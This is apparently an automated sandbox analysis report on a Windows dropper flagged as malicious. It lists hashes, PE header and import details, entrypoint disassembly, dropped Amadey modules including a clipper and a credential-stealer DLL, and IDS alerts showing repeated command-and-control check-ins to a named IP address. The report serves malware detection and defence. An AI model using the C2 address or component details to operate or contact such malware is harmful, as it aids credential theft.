SHA-256:	70C16C54B87BF8D2F57B36C26064E8E03D6F80CEB82254E556BE847A15CAEA95
SHA-512:	6200818C2CA60B10F14DAD31A55D4A89F51E0682F7459764608FD96E57663247F0DAACF8C773501077AD47D5BADD12E6829E5CFD65593366011BD1B4326117A4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L....).a............................or............@.........................................................................l...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.3469756750979025
Encrypted:	false
SSDEEP:	1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
MD5:	C79B74D8FEC5E7E2BA2F1789FD582A15
SHA1:	78A1E5D99DBACCC5E07B125E1DFB280112CB3128
SHA-256:	B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
SHA-512:	0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.621829903792328
Encrypted:	false
SSDEEP:	3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
MD5:	1B7C22A214949975556626D7217E9A39
SHA1:	D01C97E2944166ED23E47E4A62FF471AB8FA031F
SHA-256:	340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
SHA-512:	BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
Malicious:	false
Preview:	<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.8099344672941
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	537088
MD5:	16755b75334b8655bc2357553a9fdab4
SHA1:	5705cf96e5337cd165fce107d5d11c020a69fe4f
SHA256:	e2b454a6a774a94abfde2acec235fde33da717943ab9e2c5c51b8428df0f9253
SHA512:	4dd98cecf0c988ca46aab7f9544ebc326653802e65014add232c7d926194eb07c7f7ace11e1ae85c36873845680df803cffb4878371e8ba185a44a81f588b348
SSDEEP:	6144:Kky+bnr+Pp0yN90QEDJ1o6Su5TojNCee1utRhD8r8yDdTIfDYt6EeYwPmSNVzAwE:0MrPy9066SuO/pyhTIb7Y4VtukFu
TLSH:	3DB40207D6EC8022D4F557B019F343C3063B7EA15B7893AB224D9C5A1D73AA4A6713BB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

File Icon


Icon Hash:	f8e0e4e8ecccc870

Static PE Info

General

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Entrypoint Preview

Instruction
call 00007FEDA4ACE4A5h
jmp 00007FEDA4ACDDB5h
push 00000058h
push 004072B8h
call 00007FEDA4ACE547h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007FEDA4ACDDCAh
cmp eax, esi
jne 00007FEDA4ACDDB9h
xor esi, esi
inc esi
mov edi, esi
jmp 00007FEDA4ACDDC2h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007FEDA4ACDD89h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007FEDA4ACDDBCh
push 0000001Fh
call 00007FEDA4ACE2DBh
pop ecx
jmp 00007FEDA4ACDDECh
cmp dword ptr [004088B0h], ebx
jne 00007FEDA4ACDDDEh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007FEDA4ACDF06h
pop ecx
pop ecx
test eax, eax
je 00007FEDA4ACDDC9h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007FEDA4ACDEE9h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007FEDA4ACDDCDh
push 004010B4h
push 004010ACh
call 00007FEDA4ACE495h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x7aae4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x87000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x7b000	0x7ac00	False	0.9243293342668024	data	7.854654116031079	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x87000	0x888	0xa00	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xcb30	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0xf94c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0xffb4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x1029c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States
RT_ICON	0x10484	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_ICON	0x105ac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x11454	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x11cfc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States
RT_ICON	0x123c4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x1292c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x20300	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x228a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x23950	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x242d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x24740	0x2f2	data	English	United States
RT_DIALOG	0x24a34	0x35c	data	Russian	Russia
RT_DIALOG	0x24d90	0x1b0	data	English	United States
RT_DIALOG	0x24f40	0x1b4	data	Russian	Russia
RT_DIALOG	0x250f4	0x166	data	English	United States
RT_DIALOG	0x2525c	0x168	data	Russian	Russia
RT_DIALOG	0x253c4	0x1c0	data	English	United States
RT_DIALOG	0x25584	0x1e0	data	Russian	Russia
RT_DIALOG	0x25764	0x130	data	English	United States
RT_DIALOG	0x25894	0x150	data	Russian	Russia
RT_DIALOG	0x259e4	0x120	data	English	United States
RT_DIALOG	0x25b04	0x122	data	Russian	Russia
RT_STRING	0x25c28	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States
RT_STRING	0x25cb4	0x86	Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0	Russian	Russia
RT_STRING	0x25d3c	0x520	data	English	United States
RT_STRING	0x2625c	0x52e	data	Russian	Russia
RT_STRING	0x2678c	0x5cc	data	English	United States
RT_STRING	0x26d58	0x592	data	Russian	Russia
RT_STRING	0x272ec	0x4b0	data	English	United States
RT_STRING	0x2779c	0x4b2	data	Russian	Russia
RT_STRING	0x27c50	0x44a	data	English	United States
RT_STRING	0x2809c	0x43e	data	Russian	Russia
RT_STRING	0x284dc	0x3ce	data	English	United States
RT_STRING	0x288ac	0x2fc	data	Russian	Russia
RT_RCDATA	0x28ba8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x28bb0	0x5ce06	Microsoft Cabinet archive data, many, 380422 bytes, 2 files, at 0x2c +A "bfCg.exe" +A "xriv.exe", ID 1563, number 1, 18 datablocks, 0x1503 compression	English	United States
RT_RCDATA	0x859b8	0x4	data	English	United States
RT_RCDATA	0x859bc	0x24	data	English	United States
RT_RCDATA	0x859e0	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x859e8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x859f0	0x4	data	English	United States
RT_RCDATA	0x859f4	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85a00	0x4	data	English	United States
RT_RCDATA	0x85a04	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85a10	0x4	data	English	United States
RT_RCDATA	0x85a14	0x6	data	English	United States
RT_RCDATA	0x85a1c	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85a24	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0x85a2c	0xbc	data	English	United States
RT_VERSION	0x85ae8	0x408	data	English	United States
RT_VERSION	0x85ef0	0x410	data	Russian	Russia
RT_MANIFEST	0x86300	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.662.204.41.449858802027700 02/07/23-20:01:29.126524	TCP	2027700	ET TROJAN Amadey CnC Check-In	49858	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450186802027700 02/07/23-20:03:04.107236	TCP	2027700	ET TROJAN Amadey CnC Check-In	50186	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450318802027700 02/07/23-20:03:38.985319	TCP	2027700	ET TROJAN Amadey CnC Check-In	50318	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450088802027700 02/07/23-20:02:36.767849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50088	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450284802027700 02/07/23-20:03:30.624651	TCP	2027700	ET TROJAN Amadey CnC Check-In	50284	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449763802027700 02/07/23-20:01:01.550107	TCP	2027700	ET TROJAN Amadey CnC Check-In	49763	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449791802027700 02/07/23-20:01:10.547144	TCP	2027700	ET TROJAN Amadey CnC Check-In	49791	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450030802027700 02/07/23-20:02:18.384404	TCP	2027700	ET TROJAN Amadey CnC Check-In	50030	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450382802027700 02/07/23-20:03:54.707955	TCP	2027700	ET TROJAN Amadey CnC Check-In	50382	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450480802027700 02/07/23-20:04:18.662379	TCP	2027700	ET TROJAN Amadey CnC Check-In	50480	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449800802027700 02/07/23-20:01:12.702989	TCP	2027700	ET TROJAN Amadey CnC Check-In	49800	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449956802027700 02/07/23-20:01:56.737292	TCP	2027700	ET TROJAN Amadey CnC Check-In	49956	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450416802027700 02/07/23-20:04:03.085073	TCP	2027700	ET TROJAN Amadey CnC Check-In	50416	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450125802027700 02/07/23-20:02:46.439463	TCP	2027700	ET TROJAN Amadey CnC Check-In	50125	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450379802027700 02/07/23-20:03:53.987905	TCP	2027700	ET TROJAN Amadey CnC Check-In	50379	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450477802027700 02/07/23-20:04:17.942956	TCP	2027700	ET TROJAN Amadey CnC Check-In	50477	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450027802027700 02/07/23-20:02:17.657151	TCP	2027700	ET TROJAN Amadey CnC Check-In	50027	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450223802027700 02/07/23-20:03:13.167790	TCP	2027700	ET TROJAN Amadey CnC Check-In	50223	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450321802027700 02/07/23-20:03:39.741323	TCP	2027700	ET TROJAN Amadey CnC Check-In	50321	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450256802027700 02/07/23-20:03:21.219153	TCP	2027700	ET TROJAN Amadey CnC Check-In	50256	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449796802027700 02/07/23-20:01:11.751019	TCP	2027700	ET TROJAN Amadey CnC Check-In	49796	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449951802027700 02/07/23-20:01:55.550313	TCP	2027700	ET TROJAN Amadey CnC Check-In	49951	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450002802027700 02/07/23-20:02:11.408990	TCP	2027700	ET TROJAN Amadey CnC Check-In	50002	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450411802027700 02/07/23-20:04:01.821830	TCP	2027700	ET TROJAN Amadey CnC Check-In	50411	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449928802027700 02/07/23-20:01:49.894595	TCP	2027700	ET TROJAN Amadey CnC Check-In	49928	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450120802027700 02/07/23-20:02:44.901958	TCP	2027700	ET TROJAN Amadey CnC Check-In	50120	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450161802027700 02/07/23-20:02:58.254042	TCP	2027700	ET TROJAN Amadey CnC Check-In	50161	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450374802027700 02/07/23-20:03:52.768199	TCP	2027700	ET TROJAN Amadey CnC Check-In	50374	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450469802027700 02/07/23-20:04:16.004547	TCP	2027700	ET TROJAN Amadey CnC Check-In	50469	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450215802027700 02/07/23-20:03:11.200842	TCP	2027700	ET TROJAN Amadey CnC Check-In	50215	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450452802027700 02/07/23-20:04:11.861795	TCP	2027700	ET TROJAN Amadey CnC Check-In	50452	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449833802027700 02/07/23-20:01:20.483013	TCP	2027700	ET TROJAN Amadey CnC Check-In	49833	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450019802027700 02/07/23-20:02:15.689584	TCP	2027700	ET TROJAN Amadey CnC Check-In	50019	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449727802027700 02/07/23-20:00:53.058922	TCP	2027700	ET TROJAN Amadey CnC Check-In	49727	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450055802027700 02/07/23-20:02:24.503969	TCP	2027700	ET TROJAN Amadey CnC Check-In	50055	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449886802027700 02/07/23-20:01:35.832637	TCP	2027700	ET TROJAN Amadey CnC Check-In	49886	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450091802027700 02/07/23-20:02:37.622394	TCP	2027700	ET TROJAN Amadey CnC Check-In	50091	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450346802027700 02/07/23-20:03:45.861770	TCP	2027700	ET TROJAN Amadey CnC Check-In	50346	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449768802027700 02/07/23-20:01:02.811173	TCP	2027700	ET TROJAN Amadey CnC Check-In	49768	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450096802027700 02/07/23-20:02:38.862015	TCP	2027700	ET TROJAN Amadey CnC Check-In	50096	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449964802027700 02/07/23-20:01:58.773796	TCP	2027700	ET TROJAN Amadey CnC Check-In	49964	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450251802027700 02/07/23-20:03:20.007203	TCP	2027700	ET TROJAN Amadey CnC Check-In	50251	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449923802027700 02/07/23-20:01:46.547163	TCP	2027700	ET TROJAN Amadey CnC Check-In	49923	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450292802027700 02/07/23-20:03:32.559192	TCP	2027700	ET TROJAN Amadey CnC Check-In	50292	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449881802027700 02/07/23-20:01:34.599060	TCP	2027700	ET TROJAN Amadey CnC Check-In	49881	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449878802027700 02/07/23-20:01:34.080304	TCP	2027700	ET TROJAN Amadey CnC Check-In	49878	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449976802027700 02/07/23-20:02:01.442060	TCP	2027700	ET TROJAN Amadey CnC Check-In	49976	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449722802027700 02/07/23-20:00:51.810569	TCP	2027700	ET TROJAN Amadey CnC Check-In	49722	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449771802027700 02/07/23-20:01:03.532617	TCP	2027700	ET TROJAN Amadey CnC Check-In	49771	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449915802027700 02/07/23-20:01:43.056279	TCP	2027700	ET TROJAN Amadey CnC Check-In	49915	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450050802027700 02/07/23-20:02:23.248250	TCP	2027700	ET TROJAN Amadey CnC Check-In	50050	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450133802027700 02/07/23-20:02:51.437305	TCP	2027700	ET TROJAN Amadey CnC Check-In	50133	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450387802027700 02/07/23-20:03:55.955538	TCP	2027700	ET TROJAN Amadey CnC Check-In	50387	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449805802027700 02/07/23-20:01:13.918183	TCP	2027700	ET TROJAN Amadey CnC Check-In	49805	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450341802027700 02/07/23-20:03:44.643209	TCP	2027700	ET TROJAN Amadey CnC Check-In	50341	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450326802027700 02/07/23-20:03:40.953159	TCP	2027700	ET TROJAN Amadey CnC Check-In	50326	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450424802027700 02/07/23-20:04:05.016891	TCP	2027700	ET TROJAN Amadey CnC Check-In	50424	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450243802027700 02/07/23-20:03:17.999930	TCP	2027700	ET TROJAN Amadey CnC Check-In	50243	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450105802027700 02/07/23-20:02:41.198188	TCP	2027700	ET TROJAN Amadey CnC Check-In	50105	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450071802027700 02/07/23-20:02:32.235512	TCP	2027700	ET TROJAN Amadey CnC Check-In	50071	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450007802027700 02/07/23-20:02:12.669391	TCP	2027700	ET TROJAN Amadey CnC Check-In	50007	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450359802027700 02/07/23-20:03:49.032956	TCP	2027700	ET TROJAN Amadey CnC Check-In	50359	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449743802027700 02/07/23-20:00:56.902351	TCP	2027700	ET TROJAN Amadey CnC Check-In	49743	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449841802027700 02/07/23-20:01:22.423646	TCP	2027700	ET TROJAN Amadey CnC Check-In	49841	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449997802027700 02/07/23-20:02:10.169392	TCP	2027700	ET TROJAN Amadey CnC Check-In	49997	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450178802027700 02/07/23-20:03:02.400607	TCP	2027700	ET TROJAN Amadey CnC Check-In	50178	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450362802027700 02/07/23-20:03:49.798075	TCP	2027700	ET TROJAN Amadey CnC Check-In	50362	80	192.168.2.6	62.204.41.4
